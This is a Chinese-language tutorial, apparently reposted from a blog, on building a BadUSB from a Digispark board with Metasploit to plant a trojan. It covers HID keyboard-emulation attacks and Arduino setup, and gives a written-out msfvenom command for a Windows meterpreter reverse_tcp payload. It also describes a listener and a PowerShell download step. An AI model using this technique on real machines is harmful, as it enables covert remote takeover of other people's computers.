用Digispark制作BadUSB+msf植入病毒木馬


准備環境

開發板:digispark開發板(某寶上可以淘,十幾塊的就可以了)

工具:Arduino IDE

驅動:Digistump.Drivers

源碼下載地址:Msf

 

概述
在2014年美國黑帽大會上,安全研究人員JakobLell和獨立安全研究人員Karsten Nohl展示了他們稱為“BadUSB”的攻擊方法,這種攻擊方法讓USB安全和幾乎所有和USB相關的設備(包括具有USB端口的電腦)都陷入相當危險的狀態。

 

 

Badusb內部結構

從這張圖便可以了解到–Badusb和普通的U盤並沒有什么兩樣,因此迷惑性極高,很容易攻擊成功

 

 

 

 

 

 

Badusb Hid攻擊原理

HID(Human InterfaceDevice,是計算機直接與人交互的設備,例如鍵盤、鼠標等)攻擊的一種。攻擊者通過將USB設備模擬成為鍵盤,讓電腦識別成為鍵盤,然后進行腳本模擬按鍵進行攻擊。Badusb也屬於HID攻擊的一種,在badusb之前還有兩種HID攻擊分別是teensy和USB RUBBER DUCKY(usb橡皮鴨)。斗哥先介紹以下這三種類型有何不同。

 

 

 

 

配置Arduino IDE

打開 文件->首選項

把這個網址添加到附加開發板管理網址

http://digistump.com/package_digistump_index.json

 

在Arduino中添加Digispark的支持

打開 工具--開發板管理(Boards Managers)

等待開發板管理器加載完成,搜索digistump並安裝第一個Digistump AVR Boards

 

 

 打開上面的鏈接,下載Digistump.Drivers

 

解壓后執行Install Drivers.exe即可

 

 

 

測試階段

使用kali linux生成一個Payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe > shell.exe

然后打開kali linux 終端輸入msfconsole

設置好監聽

使用phpstudy搭建一個本地的環境(注:也可以放在kail 的Apache /var/www/html 下)

打開Arduino

重點就是使用powershell下載

 

接着點擊☑️進行驗證,  驗證編譯沒問題進入下一步

 

 

驗證完整后下方會提示

 

 

 接下來點擊上傳即可

 

然后請在60秒之內插入你准備好的digispark開發板(如果之前就插入了就再插一遍),沒問題的話它就會謝謝你(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿),就像這樣

 插入digispark開發板后,它會自動打開cmd,並執行

 

 

插入一台win7操作系統電腦,如下

成功!!!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM